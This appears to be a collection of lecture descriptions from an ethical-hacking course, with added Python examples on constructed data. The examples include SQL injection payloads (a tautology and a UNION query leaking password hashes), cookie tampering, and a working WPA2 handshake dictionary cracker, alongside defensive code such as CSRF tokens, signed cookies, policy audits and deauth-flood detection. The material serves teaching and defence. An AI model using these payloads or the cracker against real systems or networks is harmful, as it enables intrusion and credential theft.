
This lecture looks at exploitation as the act of taking advantage of a vulnerability. An exploit can be code, commands, or a technique used to trigger a flaw in order to bypass security controls, gain access, or cause damage. Some exploits are publicly known, while others are "zero-days": exploits for flaws that the vendor does not yet know about or has not yet patched, so no fix exists when they are first used. Ethical hackers use exploits to safely test systems and fix issues before real attackers can use them.
This lecture clarifies the difference between an exploit and a vulnerability. A vulnerability is a weakness or flaw in a system, such as a coding error or misconfiguration. An exploit is the specific code or technique used to take advantage of that vulnerability, turning the weakness into an attack. The lecture uses the analogy of a faulty lock on a door (the vulnerability) and the lockpick used to open it (the exploit). It notes that a vulnerability can exist without being exploited, but an exploit cannot exist without a vulnerability to target. Ethical hackers find and report vulnerabilities so they can be fixed before malicious actors exploit them.
This lecture outlines the six phases of the Ethical Hacking Process. The process begins with Reconnaissance, gathering information about the target. This is followed by Scanning, which identifies live hosts, open ports, running services, and potential vulnerabilities. The third phase is Gaining Access, where exploits are used to penetrate the system. After gaining entry, the hacker works to establish a persistent presence by Maintaining Access. The fifth phase is Covering Tracks, which involves deleting logs and hiding actions to simulate a real attacker; in an authorised test this phase is agreed in the rules of engagement, and any accounts, backdoors, or test files left behind are removed at the end of the engagement. Finally, the hacker documents all findings and provides recommendations in the Reporting phase.
This lecture lists and describes common exploitation tools. Metasploit is a framework used to develop, launch, and test exploits, acting as a "toolbox for ethical hackers". SQLmap is an automated tool for finding and exploiting SQL injection flaws in web applications. John the Ripper is an offline password cracker: given password hashes, it uses wordlists, mangling rules, and brute force to recover the original passwords. Hydra is a fast online brute-force tool that tries credentials against live login services such as SSH, FTP, and web forms. These tools help ethical hackers test real-world attack scenarios, but only in safe, legal environments.
This lecture provides examples of Common Vulnerabilities. SQL Injection (SQLi) occurs when attacker-controlled input is built into a database query, letting the attacker read or manipulate the database. Cross-Site Scripting (XSS) involves injecting malicious scripts into web pages that then run in other users' browsers. Local File Inclusion (LFI) is a flaw that allows attackers to trick the application into reading files already stored on the server. Remote File Inclusion (RFI) is similar but loads malicious files from attacker-controlled servers, which can lead to remote code execution. These are common flaws in poorly coded web applications and are often the first things ethical hackers look for.
This lab introduces SQLmap, an automated tool for finding and exploiting SQL injection (SQLi) vulnerabilities in web applications. SQLi is a common vulnerability where attacker-controlled input is built into a database query, letting the attacker read or manipulate the database. Using SQLmap, you will learn how to identify whether a web application is vulnerable to SQL injection and then exploit that weakness to extract data from the database. This lab is a practical example of how attackers gain access to sensitive information and demonstrates a key part of the Gaining Access phase of the ethical hacking process.
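To make the flaw concrete before the lab, here is an added example (not code from the course or from SQLmap) that builds a constructed in-memory SQLite table and shows the vulnerable query beside its parameterised fix. The two payloads are the classic boolean tautology and a UNION that pulls another column into the result, which is the kind of probing SQLmap automates against a live application. The table, its rows, and the placeholder "hashes" are constructed for the example.

```python
import sqlite3


# Constructed sample database standing in for the web application's backend;
# the password "hashes" are placeholder strings, not real digests.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
        "password_hash TEXT, is_admin INTEGER)"
    )
    conn.executemany(
        "INSERT INTO users (username, password_hash, is_admin) VALUES (?, ?, ?)",
        [("alice", "hash-alice", 1), ("bob", "hash-bob", 0)],
    )
    return conn


def lookup_vulnerable(conn, username):
    # Untrusted input is spliced into the SQL text, so the input can change the
    # statement's structure. This is the flaw SQLmap probes for.
    query = "SELECT username, is_admin FROM users WHERE username = '%s'" % username
    return conn.execute(query).fetchall()


def lookup_safe(conn, username):
    # Parameterised query: the value is bound by the driver and can never be
    # parsed as SQL, whatever characters it contains.
    return conn.execute(
        "SELECT username, is_admin FROM users WHERE username = ?", (username,)
    ).fetchall()


# Two classic payloads: a tautology that matches every row, and a UNION that
# pulls a different column (here the hash) into the result set.
BOOLEAN_PAYLOAD = "' OR '1'='1"
UNION_PAYLOAD = "' UNION SELECT password_hash, id FROM users --"


def demo():
    conn = build_db()
    return {
        "vulnerable_boolean": lookup_vulnerable(conn, BOOLEAN_PAYLOAD),
        "vulnerable_union": lookup_vulnerable(conn, UNION_PAYLOAD),
        "safe_boolean": lookup_safe(conn, BOOLEAN_PAYLOAD),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

The vulnerable lookup returns every user for the tautology and leaks the hash column through the UNION; the parameterised lookup returns nothing for either payload because the quote characters are data, not syntax.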
This lecture introduces OWASP (Open Worldwide Application Security Project). OWASP is a non-profit organisation dedicated to improving web application security. It is best known for the OWASP Top 10, a regularly updated list of the most critical web vulnerabilities. The primary goal of OWASP is to educate developers, testers, and security professionals about real-world risks and how to defend against them. By learning OWASP principles, you can gain an attacker's mindset and build more secure applications.
In this lecture, we are going to look at a simplified version of the OWASP Top 10 vulnerabilities. We will cover a range of common web security flaws, including Broken Access Control, where users can reach content or actions they are not authorised for; Injection, where untrusted input is interpreted as part of a command or query; and Cryptographic Failures, which relate to weak, misused, or missing encryption of sensitive data. We will also touch on Insecure Design, Security Misconfiguration, and other common failures.
This lecture will introduce two essential web application security tools: Burp Suite and OWASP ZAP. We will explore how they function as intercepting proxies, allowing you to inspect and modify web traffic between your browser and the target application. We'll discuss the differences between the two: Burp Suite is a commercial product (with a free Community Edition) that is widely used in professional settings, while OWASP ZAP is a free, open-source tool that is a good starting point for beginners. We'll also cover key features like spidering (crawling) and active scanning.
This lecture is about Cookie Tampering and Input Validation flaws. We will learn that cookies carry state such as a user's session identifier, and that if an application stores trust decisions (a user ID, a role flag) in a cookie without protecting it, an attacker can simply edit the value. We will see how this can be used to impersonate users or escalate privileges. We'll also cover how a lack of input validation allows attackers to submit unexpected or malicious data in forms, leading to various types of attacks. Finally, we'll discuss defensive measures against these vulnerabilities.
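The following is an added example, not code from the course, contrasting a cookie the server blindly trusts with one it signs. The naive cookie carries the role in the clear and the server believes whatever comes back; the hardened version appends an HMAC-SHA256 tag so that any edit invalidates the cookie. The server key, user, and role values are constructed for the example.

```python
import base64
import hashlib
import hmac
import secrets

# Server-side secret. Constructed here for the example; in a real deployment it
# lives in configuration, never in the cookie or the code.
SERVER_KEY = secrets.token_bytes(32)


# --- The weak pattern: the server trusts whatever the client sends back. ---
def make_naive_cookie(user, role):
    return "user=%s; role=%s" % (user, role)


def read_naive_cookie(cookie):
    return dict(part.strip().split("=", 1) for part in cookie.split(";"))


def tamper_naive(cookie):
    # Anything an attacker can do in the browser's cookie editor or an
    # intercepting proxy: change one field and replay.
    return cookie.replace("role=user", "role=admin")


# --- The hardened pattern: the server signs the cookie and verifies the tag. ---
def make_signed_cookie(user, role, key=SERVER_KEY):
    payload = ("user=%s;role=%s" % (user, role)).encode()
    tag = hmac.new(key, payload, hashlib.sha256).hexdigest()
    return base64.urlsafe_b64encode(payload).decode() + "." + tag


def read_signed_cookie(cookie, key=SERVER_KEY):
    """Returns the cookie's fields, or None if the tag does not verify."""
    try:
        b64, tag = cookie.rsplit(".", 1)
        payload = base64.urlsafe_b64decode(b64.encode())
    except ValueError:  # no "." separator or malformed base64
        return None
    expected = hmac.new(key, payload, hashlib.sha256).hexdigest()
    # Constant-time comparison so the check does not leak how many leading
    # characters of the attacker's tag were right.
    if not hmac.compare_digest(expected, tag):
        return None
    return dict(kv.split("=", 1) for kv in payload.decode().split(";"))


def tamper_signed(cookie):
    # Same edit as before, done on the decoded payload. The attacker keeps the
    # old tag because they cannot compute a new one without SERVER_KEY.
    b64, tag = cookie.rsplit(".", 1)
    payload = base64.urlsafe_b64decode(b64.encode()).decode()
    edited = payload.replace("role=user", "role=admin").encode()
    return base64.urlsafe_b64encode(edited).decode() + "." + tag
```

Signing stops modification but not reading or replay: the role is still visible to anyone holding the cookie. The usual production answer is an opaque random session identifier with the role kept server-side, plus the Secure and HttpOnly cookie attributes.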
In this lecture, we're going to look at Cross-Site Request Forgery (CSRF). We will learn how this attack works by tricking a user into performing an unintended action on a website where they are already authenticated. We'll examine how a malicious link or auto-submitting form on another site can silently send a request on the user's behalf. We'll also discuss why the target site accepts the request: the browser attaches the user's session cookie automatically, so the request looks like any other from that session. Finally, we will cover key defences such as anti-CSRF tokens and the SameSite cookie attribute.
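Here is an added example (not code from the course) that models the attack and the defence end to end with a toy banking application. Requests are plain dicts standing in for what a web framework hands a handler: the cookies the browser attaches automatically, and the form fields the submitting page supplies. The forged request from the attacker's page carries the victim's session cookie but cannot carry the per-session token, because that token is only ever embedded in pages the bank itself renders. The application, users, and amounts are constructed for the example.

```python
import hmac
import secrets


class BankApp:
    """Toy application with one state-changing endpoint, /transfer."""

    def __init__(self):
        self.sessions = {}  # session id -> {"user": ..., "csrf": ...}
        self.balances = {"alice": 100, "mallory": 0}

    def login(self, user):
        sid = secrets.token_urlsafe(16)
        # One unguessable anti-CSRF token per session, known only to the server
        # and to pages the server itself renders for this session.
        self.sessions[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
        return sid

    def render_transfer_form(self, sid):
        # The legitimate page embeds the token as a hidden field.
        token = self.sessions[sid]["csrf"]
        return (
            '<form method="POST" action="/transfer">'
            '<input type="hidden" name="csrf_token" value="%s">'
            '<input name="to"><input name="amount"></form>' % token
        )

    def transfer(self, request, check_token=True):
        sess = self.sessions.get(request["cookies"].get("session"))
        if sess is None:
            return 401
        if check_token:
            supplied = request["form"].get("csrf_token", "")
            if not hmac.compare_digest(supplied, sess["csrf"]):
                return 403  # authenticated, but not sent from a page we rendered
        amount = int(request["form"]["amount"])
        self.balances[sess["user"]] -= amount
        self.balances[request["form"]["to"]] += amount
        return 200


def forged_request(victim_sid):
    # What the bank receives when the victim's browser submits an auto-posting
    # form hosted on the attacker's site: the session cookie rides along
    # automatically, the token does not.
    return {"cookies": {"session": victim_sid},
            "form": {"to": "mallory", "amount": "50"}}


def legitimate_request(app, sid):
    # The real page round-trips the hidden token it was given.
    html = app.render_transfer_form(sid)
    token = html.split('name="csrf_token" value="')[1].split('"')[0]
    return {"cookies": {"session": sid},
            "form": {"to": "mallory", "amount": "50", "csrf_token": token}}
```

With `check_token=False` the forged request succeeds and alice's balance drops; with the check on it is refused with 403 while the genuine form still works. In a real deployment, setting the session cookie with SameSite=Lax or Strict stops the browser attaching it to cross-site POSTs in the first place, and the token check remains as defence in depth.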
In this lab, you will use OWASP ZAP (Zed Attack Proxy), a powerful and free open-source tool for testing web application security. You will learn how to use it as an intercepting proxy to inspect and modify web traffic between your browser and the internet. The lab will cover key features such as spidering, scanning, and brute-force testing to find vulnerabilities like injection flaws and weak authentication. This demonstration will provide you with a practical understanding of how ethical hackers identify weaknesses and help you learn to build more secure applications.
In this lecture we will look at Why Mobile Security Matters. We'll learn that our phones hold sensitive data like passwords, banking details, and private conversations. We will also discuss why mobile phones are a top target for attackers: they carry rich data and are often less well protected than managed computers. Additionally, we'll cover the risks of using public Wi-Fi and what can happen if a device is lost or stolen. Finally, we'll see why mobile malware, including malicious apps and links, is a growing threat.
In this lecture, we will look at Common Mobile Threats. We'll cover smishing, which is a phishing attack that uses SMS messages. We will also examine the dangers of malicious apps that can steal your data or track your activity without your knowledge. We will also discuss spyware and stalkerware that can monitor a phone's usage, and the risks posed by Bluetooth and AirDrop attacks. Lastly, we'll learn about juice jacking, a method where compromised public USB charging points are used to install malware or steal data.
In this lecture we will look at some Simple Steps to Stay Safe. We will cover the importance of using a strong PIN or biometric lock to protect your phone. We will also discuss the need to regularly update your phone's software and apps to ensure you have the latest security patches. We will learn about installing apps only from trusted stores, and why it's crucial to check an app's reviews and requested permissions. Additionally, we will cover how to use remote wipe features and why you should turn off Bluetooth and Wi-Fi in public places.
In this lecture, we will look at how to Spot the Signs of Trouble if a phone is compromised, including unusual battery drain, slow performance, strange pop-ups, and a sudden increase in data usage. We will also discuss what to do when you notice them: disconnect from the network, check recently installed apps and their permissions, and update or reset the device if the symptoms persist.
In this lecture, we will look at BYOD (Bring Your Own Device) & Work Phones. We will discuss why it's a security risk to mix personal and work data on the same device. We'll learn how to keep data separate by using dedicated apps or profiles. We'll also cover the importance of following company security policies, including any Mobile Device Management (MDM) rules. We'll also discuss the need to encrypt work communications to protect sensitive information and why you should never share your work device with others.
This lecture covers the fundamental definition and core concepts of cloud computing. We begin by establishing that cloud computing involves using internet-based services for resources like storage, servers, and software, moving away from traditional local machines. The module explores the vast array of on-demand, scalable services available, from virtual servers to machine learning platforms, highlighting the pay-as-you-go pricing model. You will learn about the major global providers, such as AWS, Azure, and Google Cloud, who maintain massive data centres. A key takeaway is understanding the cloud provider's role in managing the underlying hardware, physical security, and infrastructure, which allows you, the customer, to focus on using these services rather than maintaining the physical components yourself.
This lecture covers the essential principles of security in the cloud environment. It emphasises that moving to the cloud does not eliminate risk but changes how you manage it, requiring strong security controls just like on-premises systems. We delve into the critical role of encryption for protecting data both in transit and at rest. The module explains the necessity of robust access control to ensure only authorised users can access resources. A central theme is the Shared Responsibility Model, where the provider secures the infrastructure, but the customer must secure their data and configurations. Finally, we introduce how misconfigurations are a predominant threat, where a simple error can lead to significant data exposure.
This lecture covers the critical framework of the Shared Responsibility Model, which is the cornerstone of cloud security. We break down the distinct roles of the cloud provider and the customer in maintaining a secure environment. The provider is always responsible for the security of the cloud, including the physical data centers, hardware, and network infrastructure. Conversely, the customer is responsible for security in the cloud, which encompasses their data, applications, user access, and service configurations. The module explains how this division of duty varies depending on the service model (IaaS, PaaS, SaaS) and underscores that a misunderstanding of these roles is a leading cause of security failures and data breaches in the cloud.
This lecture covers the most prevalent threats and vulnerabilities faced in cloud environments. We identify and analyze specific risks, starting with misconfigured cloud storage, such as publicly accessible S3 buckets, which is a frequent cause of major data leaks. The module discusses the dangers of weak credentials and the lack of multi-factor authentication (MFA), which ease unauthorised access for attackers. We examine how insecure APIs can be exploited to manipulate services and extract data, and how account hijacking through phishing can lead to a complete takeover. Finally, the lecture addresses the threat of insufficient visibility and monitoring, which hinders the ability to detect and respond to incidents swiftly.
This lecture covers the key actionable strategies to build a robust security posture in the cloud. We outline fundamental best practices, beginning with implementing strong Identity and Access Management (IAM) and enforcing multi-factor authentication (MFA) to control access. The module stresses the importance of encrypting all data, both in transit and at rest, to protect its confidentiality. You will learn about the necessity of continuous logging and monitoring to gain visibility and enable rapid threat detection and response. We explain the Principle of Least Privilege to minimise potential damage from breaches. Finally, the lecture highlights the need for regular audits and reviews to proactively identify and remediate misconfigurations and security gaps.
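The misconfigured-storage threat from the previous lecture and the least-privilege and audit practices from this one come together in a small policy check. The following is an added example, not code from the course or from any cloud provider's tooling: it parses constructed AWS-style JSON policies and flags (a) resource-policy statements that grant access to everyone, which is how a bucket ends up publicly readable, and (b) identity-policy statements that allow every action on every resource. The bucket names, account ID, and role names are made up for the example.

```python
import json

# Constructed policies for the example (not from any real account).
PUBLIC_BUCKET_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "PublicRead",
        "Effect": "Allow",
        "Principal": "*",
        "Action": "s3:GetObject",
        "Resource": "arn:aws:s3:::example-backups/*",
    }],
})

SCOPED_BUCKET_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "AppRead",
        "Effect": "Allow",
        "Principal": {"AWS": "arn:aws:iam::123456789012:role/app-reader"},
        "Action": "s3:GetObject",
        "Resource": "arn:aws:s3:::example-backups/*",
    }],
})

OVERBROAD_IAM_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "AdminEverything", "Effect": "Allow", "Action": "*", "Resource": "*"},
        {"Sid": "ReadOneBucket", "Effect": "Allow", "Action": ["s3:GetObject"],
         "Resource": "arn:aws:s3:::example-backups/*"},
    ],
})


def _as_list(value):
    # The policy grammar allows either a string or a list in most positions.
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _principal_is_anyone(principal):
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS"))
    return False


def find_public_statements(policy_json):
    """Allow statements granted to everyone (for resource policies such as buckets)."""
    findings = []
    for stmt in _as_list(json.loads(policy_json).get("Statement")):
        if stmt.get("Effect") == "Allow" and _principal_is_anyone(stmt.get("Principal")):
            findings.append({
                "sid": stmt.get("Sid", "<no Sid>"),
                "actions": _as_list(stmt.get("Action")),
                # A Condition may narrow "everyone" (e.g. to one VPC); review by hand.
                "conditioned": "Condition" in stmt,
            })
    return findings


def find_wildcard_grants(policy_json):
    """Allow statements whose Action and Resource are both wildcards (identity policies)."""
    findings = []
    for stmt in _as_list(json.loads(policy_json).get("Statement")):
        if stmt.get("Effect") != "Allow":
            continue
        actions = _as_list(stmt.get("Action"))
        resources = _as_list(stmt.get("Resource"))
        wild_action = any(a == "*" or a.endswith(":*") for a in actions)
        if wild_action and "*" in resources:
            findings.append(stmt.get("Sid", "<no Sid>"))
    return findings
```

A check like this belongs in the regular audit the lecture calls for, run over every bucket and role policy rather than by hand. On AWS, the account-level S3 Block Public Access setting is the backstop that makes a public bucket policy ineffective even when one slips through.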
This lecture covers the wireless security standards that underpin Wi-Fi security and their inherent weaknesses. We begin by exploring the evolution of these protocols, from the outdated and highly insecure WEP, which can be cracked within minutes from captured traffic regardless of key strength, to the now common WPA2, where a captured four-way handshake lets an attacker guess the passphrase offline, so weak passphrases fall quickly. The module introduces the latest WPA3 standard, detailing its stronger encryption and its SAE handshake, which is designed to resist this kind of offline guessing. A central theme is understanding why wireless networks are a prime target for attackers: their radio signals can be received from outside a building's perimeter. This makes robust encryption and strong, complex passphrases essential for any network's defence.
This lecture covers the practical process of cracking Wi-Fi passwords using the Aircrack-ng toolset, a popular suite for testing network security. We break down the methodology, starting with placing a wireless adapter into monitor mode to scan for networks and capture raw frames, including the critical four-way handshake exchanged when a device connects. The module explains how, once this handshake is captured, Aircrack-ng performs a dictionary or brute-force attack against it, deriving a candidate key from each wordlist entry and checking it against the handshake until one matches. It is crucial to emphasise that this technique, which effectively demonstrates the risk of weak passphrases, must only be used legally in controlled labs or on networks where you have explicit permission.
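To show what Aircrack-ng is actually doing with a captured handshake, here is an added example (not code from the course or from Aircrack-ng) that implements the WPA2-PSK key derivation and the MIC check from the 802.11i specification and runs a wordlist against a handshake. The handshake itself is constructed in the script with random MAC addresses, nonces, and EAPOL body, and its MIC is computed from the "real" passphrase, so the cracking loop is the same one that runs against a capture file. The passphrase, SSID, and wordlist are made up.

```python
import hashlib
import hmac
import os


def pmk_from_passphrase(passphrase, ssid):
    # 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 32 bytes).
    # The SSID is the salt, so precomputed tables only help against that one SSID,
    # and the 4096 iterations are the cost each guess pays.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key, label, data, nbytes):
    # 802.11i PRF-n: concatenated HMAC-SHA1 blocks over label || 0x00 || data || counter.
    out = b""
    counter = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:nbytes]


def kck_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce):
    # PTK = PRF-384(PMK, "Pairwise key expansion",
    #               min(MACs) || max(MACs) || min(nonces) || max(nonces)) for CCMP.
    # The first 16 bytes are the KCK, the key that authenticates the handshake.
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 48)[:16]


def eapol_mic(kck, eapol_with_mic_zeroed):
    # WPA2/AES key descriptor: MIC = HMAC-SHA1-128 over the EAPOL-Key frame
    # with its MIC field set to zero.
    return hmac.new(kck, eapol_with_mic_zeroed, hashlib.sha1).digest()[:16]


def crack(handshake, wordlist):
    """Offline dictionary attack: derive PMK -> KCK per guess and compare the MIC."""
    for guess in wordlist:
        pmk = pmk_from_passphrase(guess, handshake["ssid"])
        kck = kck_from_pmk(pmk, handshake["ap_mac"], handshake["sta_mac"],
                           handshake["anonce"], handshake["snonce"])
        if hmac.compare_digest(eapol_mic(kck, handshake["eapol_zeroed"]), handshake["mic"]):
            return guess
    return None


def make_synthetic_handshake(passphrase, ssid):
    # Constructed stand-in for the fields airodump-ng would capture from the
    # four-way handshake: random MACs, nonces and EAPOL body, with a MIC
    # computed from the real passphrase.
    ap_mac, sta_mac = os.urandom(6), os.urandom(6)
    anonce, snonce = os.urandom(32), os.urandom(32)
    eapol_zeroed = os.urandom(99)
    kck = kck_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac,
            "anonce": anonce, "snonce": snonce,
            "eapol_zeroed": eapol_zeroed, "mic": eapol_mic(kck, eapol_zeroed)}


if __name__ == "__main__":
    hs = make_synthetic_handshake("letmein123", "CoffeeShop")
    print(crack(hs, ["123456", "password", "letmein123", "qwerty"]))
```

Two things follow directly from the code: the attack is entirely offline once the handshake is captured, so the access point sees nothing, and its cost is one PBKDF2 computation per guess, which is why a passphrase that appears in a wordlist falls in seconds while a long random one does not. `pmk_from_passphrase("password", "IEEE")` reproduces the published 802.11i test vector, which is a quick way to confirm the derivation is right.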
In this module, we explore the Evil Twin attack, a deceptive threat where attackers create a fake Wi-Fi network identical to a legitimate one. You will learn how these malicious hotspots, often found in public places, trick users into connecting. Once connected, the attacker can intercept unencrypted data, steal login credentials, and even inject malware into your device.
We will break down how this attack is executed with minimal equipment, highlighting its accessibility to cybercriminals. Most importantly, the lesson focuses on practical defense. You will learn essential protective strategies, such as using a trusted VPN to encrypt your connection and diligently checking for HTTPS on websites. By the end, you will be equipped to identify potential Evil Twin setups and protect your personal information on any wireless network.
This lecture covers the disruptive and exploitative nature of de-authentication attacks, which target a fundamental weakness in the Wi-Fi protocol itself. We explain how these attacks forcibly disconnect all users or specific devices from a legitimate access point, an action that does not require the attacker to know the network password. The module outlines their primary uses: to capture a WPA/WPA2 handshake for offline cracking or to herd users towards an Evil Twin network. This is possible because deauthentication frames are unencrypted management messages. Finally, we discuss how these attacks are easily detectable with proper monitoring tools and can be mitigated by implementing the 802.11w standard for Protected Management Frames.
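Because deauthentication frames are unprotected management frames, the one thing a defender reliably sees is their rate. The following is an added example, not code from the course or from any monitoring tool, of the detection logic a wireless IDS applies: it walks a constructed frame log and raises an alert when the number of deauthentication or disassociation frames attributed to one BSSID inside a short sliding window crosses a threshold. The frame log, BSSIDs, and timings are made up; a real deployment would feed it from a monitor-mode capture.

```python
from collections import deque

BROADCAST = "ff:ff:ff:ff:ff:ff"


def detect_deauth_floods(frames, threshold=10, window=2.0):
    """frames: iterable of (timestamp_s, subtype, bssid, dst).
    Returns {bssid: (first_timestamp_in_burst, count_when_alert_fired)}."""
    recent = {}   # bssid -> deque of recent deauth/disassoc timestamps
    alerts = {}
    for ts, subtype, bssid, dst in sorted(frames, key=lambda f: f[0]):
        if subtype not in ("deauth", "disassoc"):
            continue
        q = recent.setdefault(bssid, deque())
        q.append(ts)
        while q and ts - q[0] > window:   # drop frames that fell out of the window
            q.popleft()
        if len(q) >= threshold and bssid not in alerts:
            alerts[bssid] = (q[0], len(q))
    return alerts


def constructed_capture():
    # Constructed frame log. The legitimate AP sends two isolated deauths
    # (idle-timeout style) and normal data frames; an attacker spoofing that
    # AP's BSSID bursts 64 broadcast deauths in half a second at t=30s.
    ap = "02:aa:bb:cc:dd:ee"
    other_ap = "02:11:22:33:44:55"
    frames = [(t, "data", ap, "10:22:33:44:55:66") for t in range(0, 60)]
    frames += [(12.0, "deauth", ap, "10:22:33:44:55:66"),
               (41.5, "deauth", ap, "10:22:33:44:55:77")]
    frames += [(30.0 + i * 0.5 / 64, "deauth", ap, BROADCAST) for i in range(64)]
    frames += [(5.0, "deauth", other_ap, "10:22:33:44:55:88"),
               (25.0, "disassoc", other_ap, "10:22:33:44:55:88"),
               (55.0, "deauth", other_ap, "10:22:33:44:55:99")]
    return frames


if __name__ == "__main__":
    for bssid, (first, count) in detect_deauth_floods(constructed_capture()).items():
        print("deauth flood from %s starting at t=%.2fs (%d frames)" % (bssid, first, count))
```

The alert is keyed by the BSSID in the frame, which is the legitimate AP's address because the attacker spoofs it; the burst rate, not the source, is the signal. The occasional deauths from either AP never reach the threshold, so they do not alert. Kismet ships an equivalent built-in alert for deauthentication floods, and with 802.11w enabled clients discard the forged frames outright, which removes the attack rather than just detecting it.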
This lecture covers the essential software tools used by security professionals—and attackers—to analyse and test wireless network security. We introduce a suite of specialised programs, each with a distinct function. These include Reaver for exploiting WPS vulnerabilities, Aircrack-ng for cracking encryption, and Kismet for passive network discovery and detecting rogue access points. The module also covers Wireshark for deep packet analysis of captured traffic, Wifite for automating various attack sequences, and Fern WiFi Cracker as a user-friendly graphical option for scanning network weaknesses. Understanding these tools is key to comprehending both offensive techniques and defensive monitoring strategies.
This lecture covers the critical phase of post-exploitation, detailing the key objectives an attacker pursues after initially compromising a system. We explore the concept of maintaining access through methods like installing backdoors or creating new user accounts to ensure persistent entry. The module delves into the paramount goal of privilege escalation, the process of elevating access rights from a standard user to an administrator. You will learn about the importance of thorough information gathering to locate sensitive data and system configurations, and the practice of covering one's tracks by clearing logs and other evidence of activity to avoid detection. Finally, we discuss how attackers use this foothold to plan their next move, whether it's data exfiltration or lateral movement across the network.
This lecture covers the distinct methodologies and common techniques for privilege escalation on Windows and Linux operating systems. We compare and contrast the two environments, highlighting how Windows PrivEsc often focuses on exploiting misconfigured service permissions, unquoted service paths, insecure registry settings, and scheduled tasks. Conversely, Linux escalation frequently targets weak file permissions, SUID/SGID binaries, overly permissive sudo rules, and unpatched kernel vulnerabilities. The module examines the native tools leveraged in each system, such as PowerShell scripts on Windows and bash commands or scripts on Linux, to automate the discovery of security misconfigurations. Understanding these OS-specific attack vectors and security models is essential for both executing and defending against privilege escalation attacks.
This lecture covers the essential tools used by security professionals and penetration testers to automate and execute post-exploitation tasks. We provide a detailed overview of three pivotal utilities: Mimikatz, a powerful Windows tool famous for extracting plaintext passwords, hashes, and Kerberos tickets from memory. PowerView, a PowerShell script used to perform reconnaissance and exploit trust relationships within an Active Directory environment. And LinPEAS, a popular Linux bash script that automatically searches for common privilege escalation vectors, from misconfigurations to software vulnerabilities. The module emphasises that these tools, while instrumental for identifying critical security gaps, must be used responsibly and strictly within legal, authorised testing scenarios to avoid misuse.
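To make the Linux checks from the previous two lectures concrete, here is an added example (not code from the course, and not LinPEAS itself) of the kind of test an enumeration script runs: it parses a constructed `ls -l`-style listing, decodes the permission string, and flags setuid-root binaries outside a known baseline, setgid binaries outside that baseline, and world-writable files in privileged locations such as cron directories or PATH entries. The listing, baseline, and paths are constructed for the example; on a real host the input would come from `find` over the filesystem.

```python
# Constructed listing in "ls -l" form: mode, links, owner, group, path.
SAMPLE_LISTING = """\
-rwsr-xr-x 1 root root /usr/bin/passwd
-rwsr-xr-x 1 root root /usr/bin/sudo
-rwsr-xr-x 1 root root /usr/local/bin/backup-tool
-rwxrwxrwx 1 root root /usr/local/bin/health-check
-rwxr-sr-x 1 root shadow /usr/bin/chage
-rw-rw-rw- 1 root root /etc/cron.d/nightly
-rw-r--r-- 1 root root /etc/passwd
-rwsr-xr-x 1 alice alice /home/alice/tool
"""

# Binaries expected to carry setuid/setgid on this (constructed) build.
KNOWN_SETID = {"/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/chage"}

# Locations where a world-writable file lets a low-privileged user influence
# what root runs (cron jobs, binaries on root's PATH, system config).
PRIVILEGED_PREFIXES = ("/etc/", "/usr/", "/bin/", "/sbin/")


def parse_mode(mode):
    """Decode a 10-character mode string such as '-rwsr-xr-x'."""
    return {
        "suid": mode[3] in "sS",          # 's' = setuid + exec, 'S' = setuid without exec
        "sgid": mode[6] in "sS",
        "world_writable": mode[8] == "w",
    }


def find_privesc_candidates(listing, known_setid=KNOWN_SETID):
    findings = []
    for line in listing.splitlines():
        if not line.strip():
            continue
        mode, _links, owner, _group, path = line.split(None, 4)
        bits = parse_mode(mode)
        if bits["suid"] and owner == "root" and path not in known_setid:
            findings.append((path, "setuid-root binary outside the known baseline"))
        if bits["sgid"] and path not in known_setid:
            findings.append((path, "setgid binary outside the known baseline"))
        if bits["world_writable"] and path.startswith(PRIVILEGED_PREFIXES):
            findings.append((path, "world-writable file in a privileged location"))
    return findings


if __name__ == "__main__":
    for path, reason in find_privesc_candidates(SAMPLE_LISTING):
        print("%-32s %s" % (path, reason))
```

Each finding is a lead, not a confirmed escalation: the next step is to inspect the flagged binary for exploitable behaviour or to check which privileged process reads the writable file. The setuid binary owned by alice is deliberately not flagged, since setuid to a non-root user does not by itself grant root.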
This lecture covers the defensive strategy of using deception technology to detect and analyse attacker activity. We define honeypots as deliberately vulnerable systems or services designed to lure attackers, allowing defenders to study their methods without risking real assets. The module also introduces honeytokens, which are fake digital artefacts like bogus credentials or documents embedded with alerts that trigger upon access, signalling a breach or lateral movement. These tools, including low-interaction emulations and high-interaction real systems, act as digital traps that improve threat intelligence and buy valuable time for responders. Common implementations such as the Cowrie SSH honeypot and the Modern Honey Network (MHN) are also discussed to illustrate practical applications.
This hands-on lab provides a practical introduction to deception technology by guiding you through the setup and operation of the Cowrie medium-interaction honeypot. Cowrie is designed to mimic SSH and Telnet services, effectively acting as a digital trap for attackers attempting to brute-force credentials or gain shell access.
You will begin by deploying a virtual machine and installing the Cowrie software, learning how to configure it to emulate a realistic, vulnerable system. Once operational, you will simulate attack traffic by attempting to connect to your own honeypot and observing how it captures every interaction, from login attempts to executed commands, in a controlled and secure environment.
